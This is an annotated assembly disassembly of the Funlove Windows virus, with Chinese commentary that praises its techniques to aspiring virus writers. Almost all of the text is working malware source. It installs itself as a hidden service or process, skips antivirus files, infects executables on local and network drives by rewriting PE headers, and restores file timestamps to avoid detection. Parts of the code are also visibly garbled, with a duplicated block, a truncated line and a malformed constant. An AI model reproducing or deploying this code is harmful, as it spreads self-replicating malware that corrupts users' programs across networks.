国际著名病毒编写组织29A出品--Funlove

 

;*********************************************************************************************
;          Flcss.asm
;
;          disasm by Code Demon
;    
;          Code Demon Virus Dreaming Factory
;
;*********************************************************************************************

.586

ASSUME      CS:CODE,DS:CODE

CODE        SEGMENT      USE32

VSize  equ        offset      VEnd - VStart

Phys_VSize equ          1000

main:
;*********************************************************************************************
; 开始代码
;*********************************************************************************************
VStart:

      call        GetDelta        ;此子程序用于取得病毒在内存中的开始地址,是绝大
          ;多数病毒都要用到的经典技术只一,对于写一些加密
          ;的软件有很大的帮助,莱鸟必看
      lea          esi,[offset HostCode + ebx]
      mov          edi,[esp]
      sub          edi,08
      mov          [esp],edi
      movsd
      movsd

      push        dword ptr [esp + 04]
      call        RelocKernel32    ;重定位Kernel32

    or          eax,eax
    jz          short Exit

      cmp          byte ptr [offset OS + ebx],00;判断操作系统的类型
      jnz          short NT_Srv

      call        Create9xProcess  ;建立WIN9X进程
          ret

NT_Srv:  call        CreateNTService  ;建立NT服务
Exit:        ret
;*********************************************************************************************
;建立NT服务的子程序
;*********************************************************************************************
CreateNTService:

      call        RelocAdvapi32

    or          eax,eax
    jz          short CNT_Failed

      push    02
      push  00    
      push  00          ; 取服务管理器的句柄
      call        OpenSCManagerA

    or          eax,eax
    jz          short CNT_Failed

      mov          SCM_Handle,eax

      call        CreateExecutable  ;建立FLCSS.EXE,

    or        eax,eax        ; 已经驻留内存就退出.
    jz          short CNT_Exit

      mov          edi,0F01FF
      lea          esi,offset [Service + ebx]
      push      edi
      push      esi
      push        SCM_Handle
      call        OpenServiceA

    or          eax,eax
      jnz          short CNT_Run

      xor          eax,eax
      push      eax
      push      eax
      push      eax
      push      eax
      push      eax
      lea          eax,[offset Buffer1 + ebx] ;  flcss.exe
      push      eax
      push  01          ;错误代码
      push  02          ; 开始
      push  20          ; 类型
      push      edi
      push    00
      push      esi
      push        SCM_Handle    ;句柄
      call        CreateServiceA  ;建立服务

    or          eax,eax
    jz          short CNT_Failed

CNT_Run:

      push    00
      push    00
      push      eax
      call        StartServiceA    ;开始服务

    or          eax,eax
      jnz          short CNT_Exit

CNT_Failed:

      call        StartInfectionThread ;传染子程序

CNT_Exit:

          ret
;*********************************************************************************************
;建立WIN9X进程的子程序
;*********************************************************************************************
Create9xProcess:
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
      call        CreateExecutable

    or          eax,eax
    jz          short P9x_Exit
P9x_00:
      xor          eax,eax
      lea          edi,[offset Buffer2 + ebx]
      push      edi
      push      edi
      mov          ecx,040
      repz        stosd
  
      mov        cl,06
      push      eax
      loop        $ - 1
  
      lea          esi,[offset Buffer1 + ebx]
      push      esi
      push    00
      call        CreateProcessA      ;创建进程

    or          eax,eax
      jnz          short P9x_Exit

P9x_Failed:

      call        StartInfectionThread;传染子程序

P9x_Exit:
          ret

****************************************************************************
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
****************************************************************************
CreateExecutable:
      lea          edi,[offset Buffer1 + ebx]
      push        edi

      push      104
      push      edi
      call        GetSystemDirectoryA          ;取得系统目录

      add          edi,eax
      mov          al,'/'
          stosb
      lea          esi,[offset Process + ebx]
          movsd
          movsd
          movsd

      push  02    
      call        OpenFile

      cmp          eax,-1
    jz          short CE_Exit

      mov          c_FileHandle,eax

      lea          edi,[offset VImports + ebx]      ;清除 import
      mov          eax,-1
          stosd
          stosd

      lea          edi,[offset Kernel32_Relocated + ebx] ;第二个 import
      mov          eax,[edi - 8]    
          stosd

      push    00
      lea          esi,c_BytesWritten
      push      esi
      push      0200
      push      ebx
      push        c_FileHandle
      call        WriteFile          ; 写文件头

      push    00
      push      esi
      push      1000
      push      ebx
      push        c_FileHandle
      call        WriteFile          ; 写入病毒主体

      push        c_FileHandle
      call        CloseHandle          ;关闭文件

CE_Exit:
      inc      eax
          ret
;************************************************************************************
;以下应该是病毒的服务程序
;************************************************************************************
VService:

      call        GetDelta

      push        dword ptr [esp]
      call        RelocKernel32

    or          eax,eax
    jz          VS_Exit

      cmp          byte ptr [offset OS + ebx],00    ;操作系统的类型
    jz          short W9x_Service_Register          ;注册WIN9X服务

WNT_Service_Hacknowledge:

      call        RelocAdvapi32          ;重定位Advapi32
    or          eax,eax
    jz          VS_Exit

      lea          esi,[offset Buffer1 + ebx]

      xor          eax,eax
      lea          ecx,[offset Service + ebx]
      lea          edx,[offset ServiceDispatcher + ebx]
      mov          [esi],ecx
      mov          [esi + 04],edx
      mov          [esi + 08],eax
      mov          [esi + 0C],eax      ; 将控制权返回给调用者
    
      push      esi
      call        StartServiceCtrlDispatcherA

W9x_Service_Register:

      lea          esi,[offset USER32_Name + ebx]
      push      esi
      call        LoadLibraryA

      lea          esi,[offset RegisterClassA+ ebx]
      push      esi
      push      eax
      call        GetProcAddress          ;取进程的地址
    
    or          eax,eax
    jz          short VS_00

      mov          [esi - 06],eax

      lea          esi,[offset Buffer1 + ebx]
      mov          edi,esi
      xor          eax,eax
      mov          ecx,0A
      repz        stosd

      mov          dword ptr [esi + 04],-1
      mov          dword ptr [esi + 10],400000  ; WINDOWS9X的基址
      lea          eax,[offset Service + ebx]
      mov          [esi + 24],eax

      push      esi
      call        RegisterClassA      ; 这里非常重要

      lea          esi,[offset RegisterServiceProcess+ ebx]
      push      esi
      push        dword ptr [offset Kernel32_Base + ebx]
      call        GetProcAddress

    or          eax,eax
    jz          short VS_00

      mov          [esi - 06],eax

      call        GetCurrentProcessId  ;取当前进程的ID
          ; 注册为服务

      call        GetCurrentProcessId  ;取当前进程的ID
          ; 注册为服务进程,防止被用户
      push  01          ;用CTRL+ALR+DEL从任务管理器中发现
      push    eax    
      call        RegisterServiceProcess

      push    8000          ; 延时
      call        Sleep

VS_00:
      call        StartInfectionThread

VS_Exit:
          ret
;*********************************************************************************************
;NT服务子程序
;*********************************************************************************************
ServiceDispatcher:
      call        GetDelta
      lea          esi,[offset ServiceHandler + ebx]
      lea          edi,[offset Service + ebx]
      push      esi
      push      edi
      call        RegisterServiceCtrlHandlerA

      mov          Service_Handle,eax

      lea          esi,[offset Buffer1 + ebx]
      mov          edi,esi
      mov          ecx,06
      xor          eax,eax
      repz        stosd

      mov          dword ptr [esi],10
      mov          dword ptr [esi + 04],04
      mov          dword ptr [esi + 08],07

      push    esi    
      push        Service_Handle    ;告诉WINDOWS服务已经正确的运行
      call        SetServiceStatus

      push      8000
      call        Sleep

      call        StartInfectionThread  ;建立进程
          ret


ServiceHandler:
    
      ret          ; 当管理员关闭服务时,提示系统出错!好东西!!!
;*********************************************************************************************
;此子程序用于建立线程
;*********************************************************************************************
StartInfectionThread:
      call        GetTickCount
      mov        [offset Rand + ebx],eax

      lea          eax,ThreadId
      push      eax
      push    0
      push    0
      lea          eax,[offset VThread + ebx]
      push      eax
      push    0
      push    0
      call        CreateThread
          ret
;*********************************************************************************************
; 病毒线程
;*********************************************************************************************
VThread:
      call        GetDelta

      call        InfectDrives        ;感染本地文件

      push        60000
      call        Sleep

      call        GetRand
      and        al,1F
      jnz          short VThread

      call        InfectNetwork        ;感染网络文件
      jmp          short VThread

;********************************************************************************
; 通过网络传染的子程序,值得借鉴
;********************************************************************************
InfectNetwork:
      lea          eax,[offset MPR_Name + ebx]
      push      eax
      call        LoadLibraryA

    or          eax,eax
    jz          short INet_Failed

      push      eax
      lea          esi,[offset MPR_Functions + ebx]
      push      esi
      call        DLL_Relocate

    or          eax,eax
    jz          short INet_Failed

      push    00
      call        NetSearch        

INet_Failed:
          ret
;*********************************************************************************************
; 此子程序用于测试驱动器是否有效
;*********************************************************************************************
InfectDrives:
      push        esi

      call        GetTickCount
      mov        [offset Tick + ebx],eax

      lea          esi,[offset Buffer1 + ebx]
      mov          dword ptr [esi],' /:+ ebx - offset VStart'
          
ID_TestDrive:

      mov          byte ptr [esi + 03],00
      push      esi
      call        GetDriveTypeA          ;取驱动器类型

      cmp      al,03          ;硬盘?
    jz          short ID_DriveOk

      cmp      al,04          ;网络驱动器?
      jnz          short ID_Invalid

ID_DriveOk:

      add          esi,03

      push      esi
      call        BlownAway

      push      esi
      call        FileSearch          ;查找文件

      sub          esi,03

ID_Invalid:

      mov          al,[offset Buffer1 + ebx]
      inc      al
      mov        [offset Buffer1 + ebx],al

      cmp          al,'Z'
      jna          short ID_TestDrive

      pop      esi
          ret
;*********************************************************************************************
;查找计算机
;*********************************************************************************************
NetSearch :
      mov          EnumBufferSize,4000
    or          EnumNB_Objects,-1

      lea          eax,WNetStructAddr
      push      eax
      push        WNetStructAddr
      push    0
      push    0
      push    2
      call        WNetOpenEnumA

    or          eax,eax
      jnz          NET_Close

      push    04
      push      1000
      push      4000
      push    00
      call        VirtualAlloc

    or          eax,eax
    jz          short NET_Close

      mov          EnumBufferAddr,eax

NET_00:

      mov          esi,EnumBufferAddr

      lea          eax,EnumBufferSize
      push      eax
      push      esi
      lea          eax,EnumNB_Objects
      push      eax
      push        WNetStructAddr
      call        WNetEnumResourceA

    or          eax,eax
      jnz          short NET_Free

      mov          ecx,EnumNB_Objects
    or          ecx,ecx
    jz          short NET_00

NET_01:
      push      ecx
      push        esi

      mov          esi,[esi + 14]          ; 计算机名
    or        esi,esi    
    jz          short NET_03

      cmp          word ptr [esi],0041      ; 是否为软盘
    jz          short NET_03

      lea          edi,[offset Buffer1 + ebx]

NET_02:

          movsb
      cmp          byte ptr [esi],00
      jnz          short NET_02

      mov          al,'/'
          stosb

      push      edi
      call        BlownAway

      push      edi
      call        FileSearch

NET_03:

      pop        esi

      mov          eax,[esi + 0C]
      and        al,2
      cmp        al,2
      jnz          short NET_04

      push      esi
      call        NetSearch

NET_04:
      add          esi,20
      pop      ecx
      loop        NET_01

      jmp          short NET_00

NET_Free:
      push      8000
      push    00
      push        EnumBufferAddr
      call        VirtualFree

NET_Close:
      push        WNetStructAddr
      call        WNetCloseEnum
          ret
;*************************************************************************************
; 查找文件子程序,这些跟以前DOS下没什么区别,
;
; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽!  ^_^
;*************************************************************************************
FileSearch:
      mov          eax,CurrentDirEnd
      mov          dword ptr [eax],002A2E2A  ; *.*

      lea          edi,[offset Buffer2 + ebx]
      lea          esi,[offset Buffer1 + ebx]
      push      edi
      push      esi
      call        FindFirstFileA          ;找第一个文件

      cmp          eax,-1
    jz          short RS_Exit

RS_00:
      mov          SearchHandle,eax

RS_01:
      test        byte ptr [edi],10        ; 测试是目录还是文件
    jz          short FileTest

RS_Directory:

      cmp          byte ptr [edi + 2C],'.'
    jz          short RS_Next

      mov          esi,edi
      add          esi,2C

      mov          edi,CurrentDirEnd

RSD_00:
          movsb
      cmp          byte ptr [esi],0
      jnz          short RSD_00

      mov          al,'/'
          stosb

      push      edi
      call        FileSearch

RS_Next:
      lea          edi,[offset Buffer2 + ebx]
      push      edi
      push        SearchHandle
      call        FindNextFileA          ;查找下一个文件

    or          eax,eax
      jnz          short RS_01

      push        SearchHand
      
      RS_Next:
      lea          edi,[offset Buffer2 + ebx]
      push      edi
      push        SearchHandle
      call        FindNextFileA          ;查找下一个文件

    or          eax,eax
      jnz          short RS_01

      push        SearchHandle
      call        FindClose

RS_Exit:
          ret
;********************************************************************
;没什么新意,略过吧
;********************************************************************
FileTest:

      mov          edx,[edi + 2C]
    or          edx,20202020
      xor          edx,61F81F61

      lea          esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染
      mov          ecx,0C

FT_00:
          lodsd
      cmp          edx,eax
    jz          short FT_Exit

      loop        FT_00

;************************************************************************
;注意拉,
;************************************************************************
      mov          esi,edi
      add          esi,2C

FT_01:
          lodsb
    or        al,al
      jnz          short FT_01

      mov          eax,[esi - 4]          ; 扩展名判断
    or          eax,20202020

      cmp          eax,' xco'        ;控件
    jz          short FT_02

      cmp          eax,' rcs'          ;屏幕保护文件
    jz          short FT_02

      cmp          eax,' exe'          ;标准的EXE文件
      jnz          short FT_Exit

FT_02:
      mov          eax,[edi + 20]          ; 文件小于2000的就不感染
      cmp          eax,2000
    jc          short FT_Exit

      cmp      al,03          ; 检测是否已经感染
    jz          short FT_Exit

      lea          esi,[offset Buffer1 + ebx]          ; 取文件名和路径
      lea          edi,[offset Buffer3 + ebx]    
      push        edi

      mov          ecx,CurrentDirEnd
      sub          ecx,esi
      repz        movsb

      lea          esi,[offset Buffer2 + ebx]
      add          esi,2C

FT_03:
          movsb
      cmp          byte ptr [esi - 1],0
      jnz          short FT_03

      call        InfectFile        ;干活了,

FT_Exit:
      jmp          RS_Next
;*****************************************************************************************
;感染文件子程序
;*****************************************************************************************
InfectFile:
      push        i_Filename
      push  03          ; 打开文件
      call        OpenFile

      cmp          eax,-1
    jz          IN_Exit

      mov          i_FileHandle,eax

      push    00
      push      eax
      call        GetFileSize          ;取文件大小,用于以后还原

      mov          i_FileSize,eax  

      cmp      al,03          ; 是否感染
    jz        IN_Exit      

      lea          edi,[offset Buffer3 + ebx]

      push    00
      lea          esi,i_BytesRead
      push      esi
      push      2000
      push      edi
      push        i_FileHandle
      call        ReadFile
          
;*********************************************************************************
;以下的程序跟文件头有关,建议没基础者找一些相关资料看看
;*********************************************************************************
      cmp          word ptr [edi],5A4Dh        ;DOS文件头,开始有点印象了吧
      jnz          IN_CloseFile

      cmp          word ptr [edi + 18],0040    ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件
      jnz          IN_CloseFile

      cmp          dword ptr [edi + 3C],1C00  ; DOS文件头的大小
    ja          IN_CloseFile

      add          edi,[edi + 3C]          ;指向PE或NE文件头

      mov          eax,[edi]
      cmp          eax,00004550          ;PE文件吗?
      jnz          IN_CloseFile          ;此步必须,因为WIN3.X的18H的值也大于等于40H

      cmp          word ptr [edi + 5C],2    ; GUI????
      jnz          IN_CloseFile

      mov          esi,edi
      add          esi,18
      add        si,[edi + 14]          ; 将ESI指向第一个节表
      push        esi

      mov          eax,[edi + 28]          ; 查找包含"PE"的节表
          
IN_00:    
      mov          ecx,[esi + 0C]
      add          ecx,[esi + 08]

      cmp          eax,ecx
    jc          short IN_01

      add          esi,28
      jmp          short IN_00

IN_01:
      sub          eax,[esi + 0C]
      add          eax,[esi + 14]
      mov          i_EP_Offset,eax

    or          [esi + 24],80000000      ; 将它改为可写,这里是WINDOWS跟
          ;DOS在程序和数据段上的一个重要改变
          ;也是写WINDOWS病毒要注意的地方之一
      pop    esi    
      xor          ecx,ecx
      mov        cx,[edi + 06]
      dec      ecx
      mov          eax,ecx
      mov          edx,28
      mul      edx
      add        esi,eax          ; ESI指向最后一个节表

      mov          eax,[esi + 24]
      cmp      al,80          ; 是否已经初始化
    jz          IN_CloseFile

    or          eax,8C000000          ; 将它改为可写,
      and        eax,not 12000000          ; 不共享,不可丢弃
      mov          [esi + 24],eax

      mov          ecx,i_FileSize          ;这里好象跟SFX有点关系
      mov          edx,ecx
      mov          eax,ecx
        clc
      shr          eax,03
      sub          edx,eax
      sub          edx,[esi + 14]
    jc          short IN_02

      sub          edx,[esi + 10]
      jnc          IN_CloseFile

IN_02:          ; 重新计算节的长度

      mov          edx,[esi + 08]
    
      sub          ecx,[esi + 14]  
    jc          short IN_03

      cmp          edx,ecx
    ja          short IN_03

      mov          edx,ecx

IN_03:
      test        edx,00000FFF    
    jz          short IN_04

      and          edx,0FFFFF000
      add          edx,1000

IN_04:
      mov          ecx,edx
      add          ecx,[esi + 0C]
      mov          eax,ecx
      add          eax,4000
      mov          [edi + 50],eax          ; 新的长度

      sub          ecx,[edi + 28]
      add          ecx,offset VStart - 100 - 08
      mov          i_HostDep32,ecx

      mov        eax,edx    
      add          eax,4000          ; 改变虚拟大小
      mov          [esi + 08],eax

      mov        eax,edx    
      add          eax,[esi + 14]
      mov          i_VirusOffset,eax

      add          edx,1000          ; 改变物理大小
      mov          [esi + 10],edx
      add          edx,[esi + 14]
      add          edx,03

      push        i_FileHandle
      push      edx
      call        MapFile

    or          eax,eax
    jz          short IN_CloseFile

      mov          i_MapHandle,eax

      push      eax
      call        ViewMap

    or          eax,eax
    jz          short IN_CloseMap

      mov          edx,eax

      lea          esi,[offset Buffer3 + ebx]          ; 写PE文件头
      mov          edi,edx
      mov          ecx,2000
      repz        movsb

      lea          edi,[offset HostCode + ebx]
      mov          esi,i_EP_Offset
      add          esi,edx
          movsd
          movsd

      mov        edi,esi          ; 设置CALL GS:Virus
      sub          edi,08
      mov          eax,00E8659090
          stosd
      mov          eax,i_HostDep32
          stosd

      mov        edi,edx    
      mov          eax,i_FileSize
      mov          ecx,i_VirusOffset
      sub          ecx,eax
      jna          short IN_05

      add          edi,eax
      xor        al,al
      repz        stosb

IN_05:
      mov        esi,ebx          ;写入病毒主体
      mov          edi,edx
      add          edi,i_VirusOffset
      mov          ecx,VSize
      repz        movsb

      mov          ecx,Phys_VSize - VSize + 3
      repz        stosb

      push      edx
      call        UnmapViewOfFile

IN_CloseMap:

      push        i_MapHandle
      call        CloseHandle          ;关闭

      call        Wait_A_Little          ;延时

IN_CloseFile:

      lea          esi,[offset Buffer2 + 14 + ebx]      ; 恢复文件的时间
      push      esi
      sub          esi,08
      push      esi
      sub          esi,08
      push      esi
      push        i_FileHandle
      call        SetFileTime

      push        i_FileHandle
      call        CloseHandle          ;关闭文件

IN_Exit:
          ret